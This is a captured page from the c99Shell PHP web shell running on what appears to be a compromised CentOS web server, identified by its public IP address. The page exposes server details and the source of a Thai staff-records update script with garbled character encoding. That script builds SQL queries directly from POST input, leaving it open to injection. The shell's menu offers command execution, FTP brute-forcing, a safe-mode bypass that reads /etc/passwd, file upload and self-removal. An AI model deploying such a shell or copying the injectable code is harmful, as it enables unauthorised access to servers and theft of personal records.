110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage/Dev/ drwxr-xr-x Free 52.6 GB of 127.8 GB (41.16%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/var/www/html/manage/Dev/ drwxr-xr-x
Free 52.6 GB of 127.8 GB (41.16%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

Viewing file: UpdatePersonalDev-orig.php (5.99 KB) -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

";
		echo "

ЎГШіТ·УЎТГ Login ЎиН№
";
		echo "";
		exit();
	} 
	else {
		/**  Configuration  */
		require_once( "../configuration.php" );
		require_once( $_Config_absolute_path . "/includes/framework.php" );
		require_once( "../includes/Function.php" );
		require_once( "../includes/FunctionDB.php" );
	
		/**  Create Database Object  */
		$dbObj = new DBConn;

		/**  Receive values  */ 
		$id = trim( $_POST['id'] );                      // єСµГ»ГРЄТЄ№
		$prefixId = trim( $_POST['prefixId'] );    // ¤У№УЛ№йТ
		$fname   = trim( $_POST['fname'] );       //ЄЧиН
		$lname  = trim( $_POST['lname'] );         // КЎШЕ
		$birthdate = ($_POST['mYear']-543)."-".$_POST['mMonth']."-".$_POST['mDate'];  // ЗС№аЎФґ
		$sex  = trim( $_POST['sex'] );                //  аѕИ
		$appointdate   = ($_POST['mYear2']-543)."-".$_POST['mMonth2']."-".$_POST['mDate2'];  // ЗС№·ХиєГГЁШ
		$startdate  = ($_POST['mYear3']-543)."-".$_POST['mMonth3']."-".$_POST['mDate3'];  // ЗС№·Хи»ЇФєСµФ§Т№
		$fperson = trim( $_POST['fperson'] );       // КАТѕЎТГ»ЇФєСµФ§Т№
		$statusId = trim( $_POST['statusId'] );     //К¶Т№ЎТГ»ЇФєСµФ§Т№
	    $posid = trim( $_POST['posid'] );              // аЕў·ХиµУбЛ№и§
	    $poscode = trim( $_POST['poscode'] );    // µУбЛ№и§АТВ№НЎ
		$levelcode = trim( $_POST['levelcode'] );   //ГРґСє 
		$fposition = trim( $_POST['fposition'] );     //ЕСЎЙіРµУбЛ№и§
	    $deptcode = trim( $_POST['deptcode'] );  // Л№иЗВ§Т№µТБ Ё
		$tcode = trim( $_POST['tcode'] );             // Л№иЗВ§Т№·Хи»ЇФєСµФ
		$workcode = trim( $_POST['workcode'] );  //ЎЕШиБ/§Т№/ЅиТВ
		$Dev_type = trim( $_POST['Dev_type'] );  //КСТЎТГгЄй·Ш№
		$schstartdate    = ($_POST['mYear4']-543)."-".$_POST['mMonth4']."-".$_POST['mDate4'];  // ЗС№·ХигЄй·Ш№
		$schstopdate  =  ($_POST['mYear5']-543)."-".$_POST['mMonth5']."-".$_POST['mDate5'];  // ЗС№·ХиКФй№КШґЎТГгЄй·Ш№
		
		//*--------dev_hrperson --------*//
		
			
		   $sql = "SELECT * FROM  dev_hrperson  where   Teacher_code = $Teacher_code";
		   $result = mysql_query($sql);
		   $num_rows = mysql_num_rows($result);
		   
		   if($num_rows){
				 	$query =" UPDATE   dev_hrperson   SET    Teacher_code ='$Teacher_code' , id='$id', pcode ='$pcode',   fname='$fname', lname='$lname',  birthdate='$birthdate', sex='$sex', appointdate='$appointdate', startdate='$startdate', fperson='$fperson' , statusId ='$statusId', posid='$posid', poscode ='$poscode', levelcode='$levelcode', salary='$salary',  cercode='$cercode' , cerid='$cerid', fposition='$fposition' , deptcode='$deptcode', tcode='$tcode', workcode='$workcode' , Dev_type ='$Dev_type' , schstartdate ='$schstartdate' , schstopdate ='$schstopdate'   Where    Teacher_code ='$Teacher_code'     ";   
				   	$result  = $dbObj->runQuery($query);
		    		$dbObj->freeresult($result);
			}
			else{
					InsertPersonaldev ($Teacher_code, $id, $pcode ,$fname ,  $lname ,  $birthdate , $sex , $appointdate , $startdate , $fperson , $statusId, $posid, $poscode, $levelcode, $salary, $cercode, $cerid, $fposition,  $deptcode, $tcode,  $workcode, $Dev_type, $schstartdate,  $schstopdate  );
			}
		   
		          //  $query =" UPDATE   personal_tb    SET    PositionId  ='$poscode'    Where    Teacher_code ='$Teacher_code'     ";   
				  // 	$result1  = $dbObj->runQuery($query);
		    	//	$dbObj->freeresult($result1);
     	
	} # else
 ?>






ўйНБЩЕ·СиЗд»єШ¤ЕТЎГ - ўйНБЩЕбј№ЎТГКН№ - бЎйдў»ГРЗСµФјЕ§Т№ЗФЁСВ





  
    
    
     
      
        
      
      
        Л№йТЛЕСЎ » ўйНБЩЕ·СиЗд»єШ¤ЕТЎГ » ўйНБЩЕ§Т№ЗФЁСВ » јЕ§Т№ЎТГЗФЁСВ » бЎйдў»ГРЗСµФјЕ§Т№ЗФЁСВ
        
      
         
      
      
        ГРєєбЎйдўўйНБЩЕўН§·иТ№аГХВєГйНВбЕйЗ

ЎГШіТГНКйЎ¤ГЩи ЎУЕС§а»ЕХиВ№Л№йТНСµв№БСµФ

"; ?>
      
      
         
      
    
   
  




freeresult($result1);
	
	/**  Close the Database  */
	$dbObj->disconn();
	
	/**  Unset Class  */
	unset($dbObj);
?>
bool(false)

:: Command execute ::
Enter:	Select:

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Search ::

:: Upload ::

:: Make Dir ::

:: Make File ::

:: Go Dir ::

:: Go File ::

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0054 ]--